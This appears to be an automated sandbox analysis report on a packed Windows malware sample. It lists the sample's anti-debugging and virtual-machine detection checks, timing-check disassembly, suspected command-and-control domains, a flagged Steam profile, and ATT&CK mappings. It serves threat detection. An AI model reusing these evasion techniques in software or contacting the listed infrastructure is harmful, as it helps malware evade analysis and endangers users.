    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6243C second address: A62440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A62440 second address: A6246A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FDDACF47FDEh 0x0000000c push ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FDDACF47FDDh 0x00000014 pop ebx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A625C2 second address: A625C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6277B second address: A62785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDDACF47FD6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A62913 second address: A62931 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDDACAD5296h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A62D1C second address: A62D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A62D20 second address: A62D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6305D second address: A63065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A631C0 second address: A631C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A631C4 second address: A631F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDDACF47FE3h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A631F9 second address: A631FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A631FD second address: A63207 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A63207 second address: A63214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FDDACAD5286h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A63214 second address: A6321F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A675AE second address: A675B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A67780 second address: A677C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDDACF47FE1h 0x0000000f nop 0x00000010 mov dx, AF39h 0x00000014 push 00000004h 0x00000016 mov edx, dword ptr [ebp+122D2ACAh] 0x0000001c push 2F0630A1h 0x00000021 jl 00007FDDACF47FE0h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A67AD6 second address: A67ADC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A67ADC second address: A67B08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FDDACF47FD6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jo 00007FDDACF47FDCh 0x00000016 jnl 00007FDDACF47FD6h 0x0000001c pushad 0x0000001d jmp 00007FDDACF47FDDh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A67B08 second address: A67B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007FDDACAD5299h 0x00000010 ja 00007FDDACAD528Ch 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDDACAD5294h 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A67B51 second address: A67B56 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A68D32 second address: A68D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A68D36 second address: A68D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A68D3A second address: A68D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD5299h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A68D62 second address: A68D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edi 0x00000009 pop edi 0x0000000a jnp 00007FDDACF47FD6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6A56F second address: A6A575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EA0C93 second address: 4EA0CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDDACF47FE7h 0x00000009 sub ax, D8DEh 0x0000000e jmp 00007FDDACF47FE9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EA0CCF second address: 4EA0CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test ecx, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDDACAD5296h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EA0CF2 second address: 4EA0D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EA0D01 second address: 4EA0D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EA0D07 second address: 4EA0D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EA0D0B second address: 4EA0DEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD528Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FDDACAD52D4h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FDDACAD5294h 0x00000018 and esi, 51BCDD98h 0x0000001e jmp 00007FDDACAD528Bh 0x00000023 popfd 0x00000024 movzx eax, dx 0x00000027 popad 0x00000028 add eax, ecx 0x0000002a pushad 0x0000002b push ebx 0x0000002c mov bx, cx 0x0000002f pop esi 0x00000030 jmp 00007FDDACAD5299h 0x00000035 popad 0x00000036 mov eax, dword ptr [eax+00000860h] 0x0000003c jmp 00007FDDACAD528Eh 0x00000041 test eax, eax 0x00000043 pushad 0x00000044 mov bh, ah 0x00000046 mov edx, 7F0CE86Eh 0x0000004b popad 0x0000004c je 00007FDE1D6AB256h 0x00000052 pushad 0x00000053 mov di, 9746h 0x00000057 pushad 0x00000058 call 00007FDDACAD5299h 0x0000005d pop eax 0x0000005e popad 0x0000005f popad 0x00000060 test byte ptr [eax+04h], 00000005h 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 pushad 0x00000068 popad 0x00000069 pushfd 0x0000006a jmp 00007FDDACAD5296h 0x0000006f sbb ecx, 28190648h 0x00000075 jmp 00007FDDACAD528Bh 0x0000007a popfd 0x0000007b popad 0x0000007c rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 987471 second address: 987475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC0073 second address: 4EC0083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDACAD528Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC0083 second address: 4EC00AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDDACF47FE0h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC00AB second address: 4EC00BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD528Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC00BA second address: 4EC00C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EC00C0 second address: 4EC00C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7E3913 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 982EE5 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9FF3D2 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 5644Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
    Source: file.exe, file.exe, 00000000.00000002.2261714397.000000000095A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.4.drBinary or memory string: VMware
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: file.exe, 00000000.00000002.2266194355.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266194355.000000000115E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266194355.00000000011D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000000.00000002.2261714397.000000000095A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
    Source: C:\Users\user\Desktop\file.exe | File opened: SICE
    Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort

    HIPS / PFW / Operating System Protection Evasion

    Source: file.exe | String found in binary or memory: clearancek.site
    Source: file.exe | String found in binary or memory: licendfilteo.site
    Source: file.exe | String found in binary or memory: spirittunek.stor
    Source: file.exe | String found in binary or memory: bathdoomgaz.stor
    Source: file.exe | String found in binary or memory: studennotediw.stor
    Source: file.exe | String found in binary or memory: dissapoiznw.stor
    Source: file.exe | String found in binary or memory: eaglepawnoy.stor
    Source: file.exe | String found in binary or memory: mobbipenju.stor
    Source: file.exe, file.exe, 00000000.00000002.2261714397.000000000095A000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: mpProgram Manager
    Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
    Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
    MITRE ATT&CK Matrix (techniques listed per tactic column; a number preceding a technique is kept as it appears in the report)

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
    Execution: 1 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task
    Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Privilege Escalation: 2 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Defense Evasion: 24 Virtualization/Sandbox Evasion; 2 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
    Discovery: 641 Security Software Discovery; 24 Virtualization/Sandbox Evasion; 2 Process Discovery; 223 System Information Discovery; Internet Connection Discovery; Wi-Fi Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
    Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Source | Detection | Scanner | Label | Link
    file.exe | 100% | Avira | TR/Crypt.ZPACK.Gen |
    file.exe | 100% | Joe Sandbox ML | |
    No Antivirus matches
    No Antivirus matches

    Source | Detection | Scanner | Label | Link
    steamcommunity.com | 0% | Virustotal | | Browse
    sergei-esenin.com | 18% | Virustotal | | Browse
    licendfilteo.site | 16% | Virustotal | | Browse
    bathdoomgaz.store | 22% | Virustotal | | Browse
    studennotediw.store | 18% | Virustotal | | Browse
    dissapoiznw.store | 22% | Virustotal | | Browse
    eaglepawnoy.store | 19% | Virustotal | | Browse
    spirittunek.store | 22% | Virustotal | | Browse
    clearancek.site | 18% | Virustotal | | Browse
    mobbipenju.store | 22% | Virustotal | | Browse

    Source | Detection | Scanner | Label | Link
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english | 0% | URL Reputation | safe |
    https://help.steampowered.com/en/ | 0% | URL Reputation | safe |
    https://store.steampowered.com/news/ | 0% | URL Reputation | safe |
    https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe |
    http://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1 | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | 0% | URL Reputation | safe |
    http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | URL Reputation | safe |
    https://store.steampowered.com/stats/ | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 0% | URL Reputation | safe |
    https://store.steampowered.com/steam_refunds/ | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | 0% | URL Reputation | safe |
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | 0% | URL Reputation | safe |
    https://store.steampowered.com/legal/ | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e | 0% | URL Reputation | safe |
    https://steamcommunity.com/profiles/76561199724331900 | 100% | URL Reputation | malware |
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl | 0% | URL Reputation | safe |
    http://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe |
    https://store.steampowered.com/points/shop/ | 0% | URL Reputation | safe |
    http://upx.sf.net | 0% | URL Reputation | safe |
    https://store.steampowered.com/ | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | 0% | URL Reputation | safe |
    https://steamcommunity.com/profiles/76561199724331900/inventory/ | 100% | URL Reputation | malware |
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 0% | URL Reputation | safe |
    https://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english | 0% | URL Reputation | safe |
    http://store.steampowered.com/account/cookiepreferences/ | 0% | URL Reputation | safe |
    https://store.steampowered.com/mobile | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | 0% | URL Reputation | safe |
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl | 0% | URL Reputation | safe |
    https://store.steampowered.com/about/ | 0% | URL Reputation | safe |
    https://steamcommunity.com/profiles/76561199724331900/badges | 100% | URL Reputation | malware |
    https://www.cloudflare.com/learning/access-management/phishing-attack/ | 0% | Virustotal | | Browse
    https://steamcommunity.com/my/wishlist/ | 0% | Virustotal | | Browse
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp | 0% | Virustotal | | Browse
    https://steamcommunity.com/?subsection=broadcasts | 0% | Virustotal | | Browse
    https://steamcommunity.com:443/profiles/76561199724331900$ | 0% | Virustotal | | Browse
    https://steamcommunity.com/market/ | 0% | Virustotal | | Browse
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | 0% | Virustotal | | Browse
